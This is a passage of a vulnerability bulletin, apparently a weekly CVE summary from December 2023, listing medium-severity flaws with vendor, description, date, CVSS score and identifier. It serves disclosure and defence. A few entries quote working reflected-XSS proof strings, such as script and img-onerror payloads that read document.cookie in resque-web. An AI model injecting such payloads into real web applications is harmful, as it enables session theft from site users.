kashipara_group -- hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'adults' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response. | 2023-12-20 | 5.4 | CVE-2023-49269 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response. | 2023-12-20 | 5.4 | CVE-2023-49270 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response. | 2023-12-20 | 5.4 | CVE-2023-49271 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response. | 2023-12-20 | 5.4 | CVE-2023-49272 help@fluidattacks.com help@fluidattacks.com |
kodcloud -- kodexplorer | Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. | 2023-12-19 | 6.1 | CVE-2023-49489 cve@mitre.org |
libtiff -- libtiff | An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash. | 2023-12-18 | 5.5 | CVE-2023-6228 secalert@redhat.com secalert@redhat.com |
lightxun -- iptv_gateway | A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579. | 2023-12-21 | 4.3 | CVE-2023-7026 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
linux -- kernel | A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service. | 2023-12-21 | 4.4 | CVE-2023-7042 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
m-files_corporation -- m-files_server | A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests. | 2023-12-20 | 6.5 | CVE-2023-6910 security@m-files.com |
microsoft -- edge_chromium | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | 2023-12-15 | 4.3 | CVE-2023-36878 secure@microsoft.com |
microsoft -- windows | Windows Local Session Manager (LSM) Denial of Service Vulnerability | 2023-12-20 | 6.5 | CVE-2022-44684 secure@microsoft.com |
microweber -- microweber | Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. | 2023-12-15 | 4.3 | CVE-2023-6832 security@huntr.dev security@huntr.dev |
moxa -- iologik_e1200_series | A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. | 2023-12-23 | 6.5 | CVE-2023-5962 psirt@moxa.com |
mozilla -- firefox | A `<dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6869 security@mozilla.org security@mozilla.org |
mozilla -- firefox | Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6872 security@mozilla.org security@mozilla.org |
mozilla -- firefox | Multiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6135 security@mozilla.org security@mozilla.org |
mozilla -- firefox | In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6868 security@mozilla.org security@mozilla.org |
mozilla -- firefox | Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6870 security@mozilla.org security@mozilla.org |
mozilla -- firefox | Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6871 security@mozilla.org security@mozilla.org |
mozilla -- firefox/firefox_esr | `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6865 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- firefox/firefox_esr | The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. | 2023-12-19 | 6.1 | CVE-2023-6867 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6860 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 5.3 | CVE-2023-6857 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- thunderbird | The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6. | 2023-12-19 | 4.3 | CVE-2023-50761 security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- thunderbird | When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6. | 2023-12-19 | 4.3 | CVE-2023-50762 security@mozilla.org security@mozilla.org security@mozilla.org |
mr-corner -- amazing_little_poll | Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the "lp_admin.php" file in the "question" and "item" parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading. | 2023-12-20 | 4.6 | CVE-2023-6769 cve-coordination@incibe.es |
netapp -- ontap | ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. | 2023-12-15 | 4.6 | CVE-2023-27317 security-alert@netapp.com |
netapp -- ontap_mediator | ONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API. | 2023-12-21 | 5.3 | CVE-2023-27319 security-alert@netapp.com |
nextcloud -- security-advisories | Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. | 2023-12-22 | 5.4 | CVE-2023-49791 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
nextcloud -- security-advisories | Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. | 2023-12-22 | 5.3 | CVE-2023-49792 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
nextcloud -- security-advisories | The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. | 2023-12-22 | 4.3 | CVE-2023-49790 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
openbsd -- openssh | In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys. | 2023-12-18 | 5.5 | CVE-2023-51384 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
pedroetb -- tts-api | A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability. | 2023-12-19 | 5.5 | CVE-2019-25158 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpgurukul -- online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. | 2023-12-22 | 5.5 | CVE-2023-7054 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpgurukul -- online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability. | 2023-12-21 | 4.3 | CVE-2023-7051 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpgurukul -- online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. | 2023-12-22 | 4.3 | CVE-2023-7052 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpgurukul -- online_notes_sharing_system | A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. | 2023-12-22 | 4.3 | CVE-2023-7055 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpmyfaq -- phpmyfaq | Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. | 2023-12-16 | 5.4 | CVE-2023-6889 security@huntr.dev security@huntr.dev |
phpmyfaq -- phpmyfaq | Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. | 2023-12-16 | 5.4 | CVE-2023-6890 security@huntr.dev security@huntr.dev |
progress_software_corporation -- sitefinity | A malicious user could potentially use the Sitefinity system for the distribution of phishing emails. | 2023-12-20 | 4.7 | CVE-2023-6784 security@progress.com security@progress.com |
pymedusa -- medusa | Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. | 2023-12-22 | 5.3 | CVE-2023-50258 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
pymedusa -- medusa | Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. | 2023-12-22 | 5.3 | CVE-2023-50259 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
redhat -- keycloak | A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt" which could be used to bypass the security patch implemented to address CVE-2023-6134. | 2023-12-18 | 6.1 | CVE-2023-6927 secalert@redhat.com secalert@redhat.com |
resque -- resque | Resque (pronounced like "rescue") is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0. | 2023-12-21 | 6.3 | CVE-2023-50724 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
resque -- resque | Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: "/failed/?class=<script>alert(document.cookie)</script>" and "/queues/><img src=a onerror=alert(document.cookie)>". This issue has been patched in version 2.2.1. | 2023-12-22 | 6.3 | CVE-2023-50725 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
resque -- resque | Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /"><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. | 2023-12-22 | 6.3 | CVE-2023-50727 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
satellite -- satellite | An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity. | 2023-12-18 | 6 | CVE-2023-4320 secalert@redhat.com secalert@redhat.com |
silabs -- z-wave_software_development_kit | A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. | 2023-12-15 | 6.5 | CVE-2023-5310 product-security@silabs.com product-security@silabs.com |
silicon_labs -- gsdk | An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0. | 2023-12-21 | 4.6 | CVE-2023-41097 product-security@silabs.com product-security@silabs.com |
skupper_operator -- skupper_operator | A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user's purview. | 2023-12-18 | 6.8 | CVE-2023-5056 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
snowflakedb -- snowflake-connector-net | The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. | 2023-12-22 | 6 | CVE-2023-51662 security-advisories@github.com security-advisories@github.com |
softnext -- mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. | 2023-12-15 | 6.5 | CVE-2023-48381 twcert@cert.org.tw |
softnext -- mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. | 2023-12-15 | 6.5 | CVE-2023-48382 twcert@cert.org.tw |
softnext -- mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response. | 2023-12-15 | 5.3 | CVE-2023-48379 twcert@cert.org.tw |
sourcecodester -- simple_image_stack_website | A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255. | 2023-12-17 | 6.1 | CVE-2023-6896 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
sourcecodester -- simple_student_attendance_system | A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. | 2023-12-22 | 6.3 | CVE-2023-7058 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
sudo -- sudo | A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. | 2023-12-23 | 6.6 | CVE-2023-7090 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
systemd-resolved -- systemd-resolved | A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. | 2023-12-23 | 5.9 | CVE-2023-7008 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
taiwan-ca -- jcicsecuritytool | TAIWAN-CA(TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. | 2023-12-15 | 6.1 | CVE-2023-48387 twcert@cert.org.tw |
tcpreplay -- tcpreplay | Within tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack. | 2023-12-21 | 5.5 | CVE-2023-4256 secalert@redhat.com secalert@redhat.com |
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7020 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7021 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7022 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7023 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
uffizio -- gps_tracker | An Open Redirection vulnerability exists in Uffizio's GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. | 2023-12-16 | 6.1 | CVE-2020-17484 cve@mitre.org cve@mitre.org |
uyumsoft -- lioxerp | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146. | 2023-12-21 | 6.1 | CVE-2023-5988 iletisim@usom.gov.tr |
uyumsoft -- lioxerp | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146. | 2023-12-21 | 5.4 | CVE-2023-5989 iletisim@usom.gov.tr |
w3m -- w3m | An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition. | 2023-12-21 | 5.5 | CVE-2023-4255 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
wordpress -- wordpress | Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP - Donation Plugin and Fundraising Platform. This issue affects GiveWP - Donation Plugin and Fundraising Platform: from n/a through 2.25.1. | 2023-12-18 | 6.5 | CVE-2022-40312 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8. | 2023-12-21 | 6.5 | CVE-2022-45377 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6. | 2023-12-20 | 6.7 | CVE-2023-28491 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3. | 2023-12-21 | 6.5 | CVE-2023-32799 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12. | 2023-12-19 | 6.1 | CVE-2023-35883 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3. | 2023-12-19 | 6.1 | CVE-2023-37982 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3. | 2023-12-19 | 6.1 | CVE-2023-38478 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7. | 2023-12-19 | 6.1 | CVE-2023-38481 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49. | 2023-12-19 | 6.1 | CVE-2023-40602 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3. | 2023-12-19 | 6.1 | CVE-2023-41648 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9. | 2023-12-19 | 6.5 | CVE-2023-44991 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit - WordPress Affiliate Plugin. This issue affects affiliate-toolkit - WordPress Affiliate Plugin: from n/a through 3.3.9. | 2023-12-19 | 6.1 | CVE-2023-45105 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2. | 2023-12-21 | 6.5 | CVE-2023-47191 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mahlamusa Who Hit The Page - Hit Counter allows SQL Injection. This issue affects Who Hit The Page - Hit Counter: from n/a through 1.4.14.3. | 2023-12-18 | 6.5 | CVE-2023-47558 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm - Form Builder for WordPress allows Reflected XSS. his issue affects Forms by CaptainForm - Form Builder for WordPress: from n/a through 2.5.3. | 2023-12-15 | 6.1 | CVE-2023-49170 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2. | 2023-12-15 | 6.1 | CVE-2023-49176 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0. | 2023-12-15 | 6.1 | CVE-2023-49177 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. | 2023-12-15 | 6.1 | CVE-2023-49178 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. | 2023-12-15 | 6.1 | CVE-2023-49182 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. | 2023-12-15 | 6.1 | CVE-2023-49183 audit@patchstack.com |
